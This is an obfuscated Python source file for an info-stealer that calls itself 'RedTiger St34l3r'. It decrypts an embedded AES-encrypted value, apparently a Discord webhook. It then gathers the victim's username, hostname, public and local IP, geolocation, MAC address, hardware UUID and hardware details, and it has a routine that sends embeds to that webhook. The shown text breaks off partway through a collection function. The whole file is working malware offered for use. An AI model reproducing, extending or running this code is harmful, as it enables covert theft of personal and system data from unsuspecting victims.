
import sys

def JLQMJXITQGLPBHYVNTQAUUHPGYCUWQAARWMSWFLPNFTUSZUZVCJAMMKYPPVBXZLGYLWNVAHCKKSAOCZEUSIDFRIDNRLSQEHDEBMA():
    def SJDEFPSWTMMEXXBWVMSAGYXIYLWJMMWLHEGEMTLAONOMPSRYLFFMGC():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        AHIHQIQDFNFQZREFGIFNOLQJROOILCNPNDSSKXDPOOLEMTSZOWWRAGRELSFQREOBMJLOM = SJDEFPSWTMMEXXBWVMSAGYXIYLWJMMWLHEGEMTLAONOMPSRYLFFMGC()
        if AHIHQIQDFNFQZREFGIFNOLQJROOILCNPNDSSKXDPOOLEMTSZOWWRAGRELSFQREOBMJLOM == True:
            return AHIHQIQDFNFQZREFGIFNOLQJROOILCNPNDSSKXDPOOLEMTSZOWWRAGRELSFQREOBMJLOM
    except:
        return True
    
if JLQMJXITQGLPBHYVNTQAUUHPGYCUWQAARWMSWFLPNFTUSZUZVCJAMMKYPPVBXZLGYLWNVAHCKKSAOCZEUSIDFRIDNRLSQEHDEBMA() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
from discord import SyncWebhook
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def HSYUFIFWOCIXCZKJZQEPAHRQCTGLRHZJMTHKPFYPSSCMBNBONPEIWGUEMRVMRDWMOHHJORMVEQ(): pass
def UWKQQTIXMBXMKSQSTYWTKPQAWENWEWYXUFCKVPDVKJOMAJAZEHLRYQMTUGMSIICG(): pass
def ZFHXYNLVKVUZVCRJHGVMICBTFNUUIJEXKEBTIRDJBWRNPQAOORLW(): pass
def TBYCQZFHQJGDHNBYHFPEAVBTCYKSJJUSXDIKSIPVMLRYYLFROAFYWMSXALWFIBWRNGEMGNHLSSRRKVYKEMNFCEQ(): pass
def GENNGVNHESTFVLKFZPFRCESLWRXDTKPUAQOVGNLMGSSMYGRFSBTTDDEVHLRTUAFTKUVIDBZDERUHPWEKUGM(): pass
def KXOKZHYULWCXXOYYUXTJBTPQJAZLHJDMHZEYYHIJTVEKLYNIUMZACZFNQSMIQVGOJHZHBJEKXBQAJCHHYQTJPMSYHNH(): pass
def QWRJEFUDZFWZCLOYQHMCJWJKYONKEFCGVFNUOEEFGBGDXIPNGZXRUFQBBLRMEPUY(): pass
def WYDCJZQHCVQHVFPERWVDLSALHEMAUKMYPMPXDHLYNWMUKFAXJZZXLVAORRCRM(): pass
def UHNKXCIUCYFGYLBVQYJHZVJGRNRLGQNRBKZDPTEZKSXYCRWCCFSTTTXLNTDOHHKYCLJNMDQVBIJXJRDXMCONYWLPPPHYXLGVEGPT(): pass
def NKGXZYKMZWSPYTXLUCOKRFSGCZWYKLEESHDANTNZCGQCMIMBTLGQDXQNTPOWZJIBYTS(): pass
def GCXCGITAZLRORAVNLWTTRRHMTIAQGZHMEIPRICXAOAHYQFWQGCJRRONECGXKVUKVHVHI(): pass
def MAAQYXPRVDTOHHMZLQBTEDCOILPJRKNEDLLCDDHMAENGKJTHOUVHNQOLSRVDOTOOYPRACVQ(): pass
def BBCIGCEUHBLYLJOBUWUNDTPXOIFCBKBCPIRVGXWEJJTUUCTXIUBFQGACL(): pass
def MSVIEISEQLCQTCTCAXERQHJAUSAANHNLPCQIHGIFQIOJSRSCEUBZWFHOPADLTNOZHA(): pass
def GHVOIEBFHVFKCAUZOOWSUIVYBGIMDNUAJQGGHDZQAHJDDYKLPFAFASMWDSZOZGYWTHWNRHZLKEVGYKATDPIKED(): pass
def HQFGLUCKVMPZZVBFCCUBGMNHQANWHFYBGBLVWFUGTDBEVQGARDLU(): pass
def PLTNTSHJJRYEOMGEBBBGXDHRCAPKACWZYQJAHBNFPXYCREGERGWVNUSEXHNBUSQRKDBSEWMNSNCCGRAROKSMXZFBHWZL(): pass
def DFDNKZAVJSLDXGQACSLOLZYNTMZQUSBKASXVXJIZSSKZDWKLWLKXIULFUIWMSWMMEMHICKIUSRBA(): pass
def ZHNUCWAXSHDYPFKAFDEVTAIPICPNPRYQUWYLZMREZQNEJMMJEOUKWEAEDCZLOYI(): pass
def ANUYLWENJNVXDPVJZJIRQWDJSJXZYTQRFKTPLDOBXDGVHVCPXFXSVYUHQJMKFHEKBIVMUGR(): pass

def HHBNVVHCECGMCXAKTXEOCOCQBBWDOBYRALZYCCJOGYAATPBBWLOJBQU(w3bh00k_ur1, title=None, description=None):
    try:
        client = SyncWebhook.from_url(w3bh00k_ur1)
        embed = discord.Embed(
            title=title,
            description=description,
            color= NDZNZJWCYHXULIEBQOGILPOEDLVAIHCGAVLBZYISVQROYBYCYXLBUEAGSKGONODBBJIVP
        )
        embed.set_footer(text=GDBWKXYLDZVZBNWZZFFZYRRGPHFAMOYZKBGQJCAWYZHKXURVGYSOFDUEQZLDPTGN, icon_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR)
        client.send(embed=embed, username=TCQVWBVWRGAWZJFAVAAEZLFRUWGNTHXWRMCHKMDTPFLHWJJBRKGWLG, avatar_url=IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR)
    except: pass

def VANNVHDUBLBCYNIDEEHIEZQNUXZEITSYVBIBMLFKMYLFNAWCXBTBKNYSQMQTSWXCVVVBTFTXZEX(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def FUAFRKHNVQCBZUXFJDQUHOSGIEJFJZNVJKRKZSNFCUOXNHJAPSXZJIPKRAGDALSNSWIHB():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def EETINXGTAXUPCZKGJWPCQZCPPKTCNPEXFEHHNZHEJRIXVZBVIAETNTDWOOXKVXGUHGWG(VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS, FNOUMHRDXOTCTMXDYIMDEJNBXDJXVEMTZULWXADIAYUKPQFQYJYJLRLQSGZFFJSYSNYDZBURSFGAJDJXINVAIMVTAXGMZYQMS):
    def OYJOTJXBMXQDQEBILCKQJZNHKCBQTALFNKPUIDDYKULIJMLAGFIMIGPCEWRKAAPQEU(BMHUHOECYVKPYBVWUNYRPVSDENKRCSZRHYPIMIGFAVBEAKUTSRUNOVTNOCIDFZRIPTZOVZCUZYZTJUVZTDHCUHITOACMLIOMVRCE, PETWWKILLGKPUCDSXKCIIRMQIIRDOGFTMHHSVMQWWQWNHYCWPAIOKUNSHBOGVSXDO):
        IOPVVCUNLBYMKESDIURHGBIESSPVOZRPYCOSDTRJMFRYLSIKINPRFUNBFRE = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=PETWWKILLGKPUCDSXKCIIRMQIIRDOGFTMHHSVMQWWQWNHYCWPAIOKUNSHBOGVSXDO, iterations=100000, backend=default_backend())
        if isinstance(BMHUHOECYVKPYBVWUNYRPVSDENKRCSZRHYPIMIGFAVBEAKUTSRUNOVTNOCIDFZRIPTZOVZCUZYZTJUVZTDHCUHITOACMLIOMVRCE, str):  
            BMHUHOECYVKPYBVWUNYRPVSDENKRCSZRHYPIMIGFAVBEAKUTSRUNOVTNOCIDFZRIPTZOVZCUZYZTJUVZTDHCUHITOACMLIOMVRCE = BMHUHOECYVKPYBVWUNYRPVSDENKRCSZRHYPIMIGFAVBEAKUTSRUNOVTNOCIDFZRIPTZOVZCUZYZTJUVZTDHCUHITOACMLIOMVRCE.encode()  
        return IOPVVCUNLBYMKESDIURHGBIESSPVOZRPYCOSDTRJMFRYLSIKINPRFUNBFRE.derive(BMHUHOECYVKPYBVWUNYRPVSDENKRCSZRHYPIMIGFAVBEAKUTSRUNOVTNOCIDFZRIPTZOVZCUZYZTJUVZTDHCUHITOACMLIOMVRCE)

    VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS_data = base64.b64decode(VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS)
    PETWWKILLGKPUCDSXKCIIRMQIIRDOGFTMHHSVMQWWQWNHYCWPAIOKUNSHBOGVSXDO = VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS_data[:16]
    PQDZINNTNOHZNWHRVBFBROZQULWCLJYILZCCOLCLOTHTLZJVIGJGMH = VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS_data[16:32]
    VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS_data = VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS_data[32:]
    TCKNTLEHKGRAVGKQXWIMWWWHKSJHRSZXQNSQYYMGWUCBRAHWKYAXXYUXCEGPOVALXNTOKRLOOUSZQSJV = OYJOTJXBMXQDQEBILCKQJZNHKCBQTALFNKPUIDDYKULIJMLAGFIMIGPCEWRKAAPQEU(FNOUMHRDXOTCTMXDYIMDEJNBXDJXVEMTZULWXADIAYUKPQFQYJYJLRLQSGZFFJSYSNYDZBURSFGAJDJXINVAIMVTAXGMZYQMS, PETWWKILLGKPUCDSXKCIIRMQIIRDOGFTMHHSVMQWWQWNHYCWPAIOKUNSHBOGVSXDO)
    QIELSRILKDTBSOOLNXOVNLKNBAYVKXZZDWIZDLZDJHMPYUUDTFFIQSCKYHYTJONGAMJCHDCHCCPXJWQTTZOMGOXALRTC = Cipher(algorithms.AES(TCKNTLEHKGRAVGKQXWIMWWWHKSJHRSZXQNSQYYMGWUCBRAHWKYAXXYUXCEGPOVALXNTOKRLOOUSZQSJV), modes.CBC(PQDZINNTNOHZNWHRVBFBROZQULWCLJYILZCCOLCLOTHTLZJVIGJGMH), backend=default_backend())
    MRPNGLIMASCZKYXETZVGCJEGOEHFJMCBLXJXPRRWLLNIRIDWBNSD = QIELSRILKDTBSOOLNXOVNLKNBAYVKXZZDWIZDLZDJHMPYUUDTFFIQSCKYHYTJONGAMJCHDCHCCPXJWQTTZOMGOXALRTC.decryptor()
    QKBRGVZYCXSHGJAHGPZRITKPOVZTVDKONFAMZUQCCWGJOUWGDHMSIPOOARQCFHEWWG = MRPNGLIMASCZKYXETZVGCJEGOEHFJMCBLXJXPRRWLLNIRIDWBNSD.update(VYTUOXISWHIJIONYXPPGJDDZAHAGAMPRMHBTWTCKLPOVYCICRHCJHCMYFEFS_data) + MRPNGLIMASCZKYXETZVGCJEGOEHFJMCBLXJXPRRWLLNIRIDWBNSD.finalize()
    ACARMLXHKULCHHEEQKQOGAZLVCCWXGXQGBSIEFGLUBETFIWFTOJXWDRTGRJLARYTOSGZGSBPHVLLNZQEWTZTUHLTAPDXH = padding.PKCS7(128).unpadder()
    LAFRTCCEOYCASUGHTGCCNZUGMSSMEFNREQWXUOBLOMFUMUEIIBWLIQVKBLLE = ACARMLXHKULCHHEEQKQOGAZLVCCWXGXQGBSIEFGLUBETFIWFTOJXWDRTGRJLARYTOSGZGSBPHVLLNZQEWTZTUHLTAPDXH.update(QKBRGVZYCXSHGJAHGPZRITKPOVZTVDKONFAMZUQCCWGJOUWGDHMSIPOOARQCFHEWWG) + ACARMLXHKULCHHEEQKQOGAZLVCCWXGXQGBSIEFGLUBETFIWFTOJXWDRTGRJLARYTOSGZGSBPHVLLNZQEWTZTUHLTAPDXH.finalize()
    return LAFRTCCEOYCASUGHTGCCNZUGMSSMEFNREQWXUOBLOMFUMUEIIBWLIQVKBLLE.decode()

VANNVHDUBLBCYNIDEEHIEZQNUXZEITSYVBIBMLFKMYLFNAWCXBTBKNYSQMQTSWXCVVVBTFTXZEX("")

try: QGMOKCWSVTHNVDTBSOYGANWIGUGSPYNEOLVIJYGTNOYJTRTKJYMRZYXCHNTGSCNDDPXVRCHSDCSGMNMYCBZM    = socket.gethostname()
except: QGMOKCWSVTHNVDTBSOYGANWIGUGSPYNEOLVIJYGTNOYJTRTKJYMRZYXCHNTGSCNDDPXVRCHSDCSGMNMYCBZM = "None"

try: XVGSADWUBLBDNDPLJWYXLDTLSAXVRNLOGROGUDEDSZXENAPSGOCVRZN    = os.getlogin()
except: XVGSADWUBLBDNDPLJWYXLDTLSAXVRNLOGROGUDEDSZXENAPSGOCVRZN = "None"

try: JSOIMISCXLVEUDBEXGIPFMEQPKKNBOCHLDMTWURUGRMZZQTFVCGBAVGCYDDJMBDTJIDVADVM    = win32api.GetUserNameEx(win32api.NameDisplay)
except: JSOIMISCXLVEUDBEXGIPFMEQPKKNBOCHLDMTWURUGRMZZQTFVCGBAVGCYDDJMBDTJIDVADVM = "None"

try: EBRLITLEOUKWQPCEPRJVPEYNWSXBEGAANMWMWDCSHMORJOTXGBXOOPNAML    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: EBRLITLEOUKWQPCEPRJVPEYNWSXBEGAANMWMWDCSHMORJOTXGBXOOPNAML = "None"

try: WGYIHTFTXYXAONMOKUPZNGXBSRTSGZNFLXIFCVSOCFFTTLLHFQNRXCSSMFNYIVEBJNOCF    = socket.gethostbyname(socket.gethostname())
except: WGYIHTFTXYXAONMOKUPZNGXBSRTSGZNFLXIFCVSOCFFTTLLHFQNRXCSSMFNYIVEBJNOCF = "None"

ANJMMSUEFCISZHBAXPAHDMDSLIJOZPNYAKCFSMYVAIACQOFEJXISHJKPKOZGUQGETWXTFLQADXXXUW = r"""
WsDoeQNUE6DxmxXYbhVcbHIkB88JvTAtBEB3b/H0RshdjFg4ksK3dn3p21I5j2Wxcfp+4QAxlP25vIICYjz1DA==
"""

GVTLCUCGVEYNVTJGCXZRSFTXEDFASCSXTYCUQTIGTDINWHDEOGMOQAYVB            = "CYqAbpaCpLIjqUNxUDAnmUmbeVnScQjFwISzLONJyzCpxMVgfJrDppFGIWbAreeAqbYGpjljeDCiSRbgEfBWiZcEaGJGshknmHpoVeMugZXXRpdkzGAzhssbV"
XSNSHIWPAAMFGWOQCVQDGGQNQEAIHHBPOXMCBOOORNZRPFBJTOTEPV        = "redtiger.shop"
NDZNZJWCYHXULIEBQOGILPOEDLVAIHCGAVLBZYISVQROYBYCYXLBUEAGSKGONODBBJIVP    = 0xa80505
TCQVWBVWRGAWZJFAVAAEZLFRUWGNTHXWRMCHKMDTPFLHWJJBRKGWLG = "RedTiger St34l3r"
IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR   = "https://cdn.discordapp.com/attachments/1337898355279401023/1341890893858213908/RedTiger-Logo.png?ex=67b7a4c8&is=67b65348&hm=174ddbd80dd8570fa83779687def6eda441a7c12abd3765d970c1958ceeb1ec8&"
GDBWKXYLDZVZBNWZZFFZYRRGPHFAMOYZKBGQJCAWYZHKXURVGYSOFDUEQZLDPTGN    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
IYDFIOIHOTWHBDZXZWVNPPHUBICVRGAANKIDCVJNPDVMWANCEXBJNRBFDU   = {"text": GDBWKXYLDZVZBNWZZFFZYRRGPHFAMOYZKBGQJCAWYZHKXURVGYSOFDUEQZLDPTGN, "icon_url": IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR}
QLCBWIEQVVUZNWUHVOQAXBXBRKUEXVCCUMVVWGSWYHYIBWRRGKZVYGLLHXYCID    = f'`{XVGSADWUBLBDNDPLJWYXLDTLSAXVRNLOGROGUDEDSZXENAPSGOCVRZN} "{EBRLITLEOUKWQPCEPRJVPEYNWSXBEGAANMWMWDCSHMORJOTXGBXOOPNAML}"`'
XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD    = EETINXGTAXUPCZKGJWPCQZCPPKTCNPEXFEHHNZHEJRIXVZBVIAETNTDWOOXKVXGUHGWG(ANJMMSUEFCISZHBAXPAHDMDSLIJOZPNYAKCFSMYVAIACQOFEJXISHJKPKOZGUQGETWXTFLQADXXXUW, GVTLCUCGVEYNVTJGCXZRSFTXEDFASCSXTYCUQTIGTDINWHDEOGMOQAYVB)

CQJVENAFPMVSXYKLJUQTSFXKEWTGZVKWJEXMYVRFVNNINEPCROWUIWYMASKPLEORAPZPXVFOZJAKLKKIETABGUTHML         = os.getenv("WINDIR", None).replace(" ", "%20")
HHPRRZNDUBKBWEXBEJPMUVCRARSWMCRJVKFCJQWNMOHFPEIQQWKFIYFQMBWPSNEVYKOQXHAZWEKNNMEIIVERUSCEHNPCPZYBX     = os.getenv('USERPROFILE', None).replace(" ", "%20")
BPEJIQCAHRWWZFPYTVPLONMHMJSRBAOPKBQOIWMCYBSALGUOVHIDFCCFOVMSPODOKHRNJUWVN   = os.getenv('LOCALAPPDATA', None).replace(" ", "%20")
EDEILHBMLXXOKHZBOJMLHPTMYZXWGNRGSNVGJQCARNYCKMKYYHRNRCWCRAMUJYSLRIIRVFGGNNCFVAX = os.getenv('APPDATA', None).replace(" ", "%20")

try:
    NVALOEFLHLTUGXKXGHCTBSXPILSZJIBWYVWACOYBOUCFNLNSNYYZOSFFQYUVHMMFKTBG = requests.get(f"https://{XSNSHIWPAAMFGWOQCVQDGGQNQEAIHHBPOXMCBOOORNZRPFBJTOTEPV}/api/ip/ip={EBRLITLEOUKWQPCEPRJVPEYNWSXBEGAANMWMWDCSHMORJOTXGBXOOPNAML}")
    UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX = NVALOEFLHLTUGXKXGHCTBSXPILSZJIBWYVWACOYBOUCFNLNSNYYZOSFFQYUVHMMFKTBG.json()

    XXFCLHELCZPNCWKZNJQRCTDIWJOKVADEZMRGQZZMYSGFNQKAQKGOLAVYMOYJIGYZHCHJQXTGWHLGWK = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('country', "None")
    XXFCLHELCZPNCWKZNJQRCTDIWJOKVADEZMRGQZZMYSGFNQKAQKGOLAVYMOYJIGYZHCHJQXTGWHLGWK_code = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('country_code', "None")
    NRPFMBTGIFZSFVICYCYACARHWXWUVINFUHKSTSGYFTGYVPRRUYIVIVLSPPBDAPNMPP = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('region', "None")
    NRPFMBTGIFZSFVICYCYACARHWXWUVINFUHKSTSGYFTGYVPRRUYIVIVLSPPBDAPNMPP_code = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('region_code', "None")
    NILJWIHFAXKFBZCBYZKFRNYKETBSOIGXGMYXZNVKXQKBJKGSYAU = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('zip', "None")
    APIRNPHVEJLPBFHPXPFGXOCROHHXWSEAZVFOXQOQSLAXUNVYHLLOXYAPAVTIR = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('city', "None")
    XQLKLYOQDTOSONOTRMCZGXEKFLKJJGUJAGYCEETPMXDDEDFAYRGNHBQDTNWUVOYRVZQLOL = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('latitude', "None")
    DGMAEMFRDQZRPLILPTPENSCTTNOKOEIXSZUAIQJGCDCFRKHXLLLLDXAQDYXLIFFSFIOCDMRSKXHTDLIOJHAXNNDIMONOTTBHIDTU = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('longitude', "None")
    CZDKUQDIGYRGAEHBQBQAJCLYHPNFKPNYBPBBRGYPZAXUKSBXWDURJQSOMZYN = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('timezone', "None")
    YELBESAUZAQRAABOBJLHUDLVWLIRNOJEIHWJDHMWCIJRASYCCOKOJYNNJQYGELIAYMONDWVVT = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('isp', "None")
    ZCBIGMOQZKTCSLNATTHGFDMKODGCSKPDPPJXGGCZNZEKRSLRBGACJTECSJALJSV = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('org', "None")
    VDLNVSHFUUFWISFCJDQCOXAYZKVDRKDKOZWYPLABHTNVBXLHSEVSJAN = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('as', "None")
except:
    NVALOEFLHLTUGXKXGHCTBSXPILSZJIBWYVWACOYBOUCFNLNSNYYZOSFFQYUVHMMFKTBG = requests.get(f"http://ip-api.com/json/{EBRLITLEOUKWQPCEPRJVPEYNWSXBEGAANMWMWDCSHMORJOTXGBXOOPNAML}")
    UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX = NVALOEFLHLTUGXKXGHCTBSXPILSZJIBWYVWACOYBOUCFNLNSNYYZOSFFQYUVHMMFKTBG.json()

    XXFCLHELCZPNCWKZNJQRCTDIWJOKVADEZMRGQZZMYSGFNQKAQKGOLAVYMOYJIGYZHCHJQXTGWHLGWK = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('country', "None")
    XXFCLHELCZPNCWKZNJQRCTDIWJOKVADEZMRGQZZMYSGFNQKAQKGOLAVYMOYJIGYZHCHJQXTGWHLGWK_code = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('countryCode', "None")
    NRPFMBTGIFZSFVICYCYACARHWXWUVINFUHKSTSGYFTGYVPRRUYIVIVLSPPBDAPNMPP = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('regionName', "None")
    NRPFMBTGIFZSFVICYCYACARHWXWUVINFUHKSTSGYFTGYVPRRUYIVIVLSPPBDAPNMPP_code = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('region', "None")
    NILJWIHFAXKFBZCBYZKFRNYKETBSOIGXGMYXZNVKXQKBJKGSYAU = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('zip', "None")
    APIRNPHVEJLPBFHPXPFGXOCROHHXWSEAZVFOXQOQSLAXUNVYHLLOXYAPAVTIR = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('city', "None")
    XQLKLYOQDTOSONOTRMCZGXEKFLKJJGUJAGYCEETPMXDDEDFAYRGNHBQDTNWUVOYRVZQLOL = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('lat', "None")
    DGMAEMFRDQZRPLILPTPENSCTTNOKOEIXSZUAIQJGCDCFRKHXLLLLDXAQDYXLIFFSFIOCDMRSKXHTDLIOJHAXNNDIMONOTTBHIDTU = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('lon', "None")
    CZDKUQDIGYRGAEHBQBQAJCLYHPNFKPNYBPBBRGYPZAXUKSBXWDURJQSOMZYN = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('timezone', "None")
    YELBESAUZAQRAABOBJLHUDLVWLIRNOJEIHWJDHMWCIJRASYCCOKOJYNNJQYGELIAYMONDWVVT = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('isp', "None")
    ZCBIGMOQZKTCSLNATTHGFDMKODGCSKPDPPJXGGCZNZEKRSLRBGACJTECSJALJSV = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('org', "None")
    VDLNVSHFUUFWISFCJDQCOXAYZKVDRKDKOZWYPLABHTNVBXLHSEVSJAN = UUBXHOQNNWUBMGQVQWWHTZBJEGLGJKDYAUHDZIVOULBGOZEKAWUGGYKXKGTMQROFUALIQPHNQPXKX.get('as', "None")

def QWRJEFUDZFWZCLOYQHMCJWJKYONKEFCGVFNUOEEFGBGDXIPNGZXRUFQBBLRMEPUY():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: PSNNUTNMLSHLFNUOZUJOKZYFIMXASLMTTBETRYXWJQKLFLKEKES = {platform.system()}
    except: PSNNUTNMLSHLFNUOZUJOKZYFIMXASLMTTBETRYXWJQKLFLKEKES = "None"

    try: GJHLZEYKUVXZAKWZTHUZUUFSPFDVQZOAOYGIGAHDFZIVRDHDJCTQGTFRSY = platform.version()
    except: GJHLZEYKUVXZAKWZTHUZUUFSPFDVQZOAOYGIGAHDFZIVRDHDJCTQGTFRSY = "None"

    try: EHLAAZYEQXIPMFWMQAIJPQDSDSIIFTMBPMPHOMMFMZFDYHWCNEHHZARNRGYAEALTTRRAEDQGOXMXJLEOJHM = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: EHLAAZYEQXIPMFWMQAIJPQDSDSIIFTMBPMPHOMMFMZFDYHWCNEHHZARNRGYAEALTTRRAEDQGOXMXJLEOJHM = "None"

    try: GYHENUVWTAGEEHRQQQSWWSIWDIICAERLCZSGVGMOMLQBQRBLEDJXDGIORTFQTBTEYMSHKZVNLHAVH = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: GYHENUVWTAGEEHRQQQSWWSIWDIICAERLCZSGVGMOMLQBQRBLEDJXDGIORTFQTBTEYMSHKZVNLHAVH = "None"

    try: XNBLWRFBBOFUPVSTYDXFLGVODKLYFWUMGSYZZASKZILSATXKDOQURPYSIZMLOLDAGTTZQDRBMTNOXYM = round(psutil.virtual_memory().total / (1024**3), 2)
    except: XNBLWRFBBOFUPVSTYDXFLGVODKLYFWUMGSYZZASKZILSATXKDOQURPYSIZMLOLDAGTTZQDRBMTNOXYM = "None"

    try: BPKLPXHQCAJQVRMJONTYKQXTCQNESBKOVRAJSEJVZVUOOHUADLQNKDWLRHOMSFVUGBN = platform.processor()
    except: BPKLPXHQCAJQVRMJONTYKQXTCQNESBKOVRAJSEJVZVUOOHUADLQNKDWLRHOMSFVUGBN = "None"

    try: OFZMBFCUWRBSXKSBMGQTUMAKSDLTLIWDMCEYQMYBNVBTBQMGOSHRTJI = psutil.cpu_count(logical=False)
    except: OFZMBFCUWRBSXKSBMGQTUMAKSDLTLIWDMCEYQMYBNVBTBQMGOSHRTJI = "None"

    try: TVOMOKOXJYFHLOMFMMABSPSCPHSUMEQZNQFHMFQRYEERKLPMDPXCWFXJRHOYOALIFTFKXKSSVPQCXIRUXDOO = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: TVOMOKOXJYFHLOMFMMABSPSCPHSUMEQZNQFHMFQRYEERKLPMDPXCWFXJRHOYOALIFTFKXKSSVPQCXIRUXDOO = "None"

    try:
        PZEYIDHGWCIKPPNPGMNIANEZNEJDYMNUAJMMJKEKJEHIIRTHBVYFWSRARUJADRFVNMHNXMBSGGAELYWYIFI = []
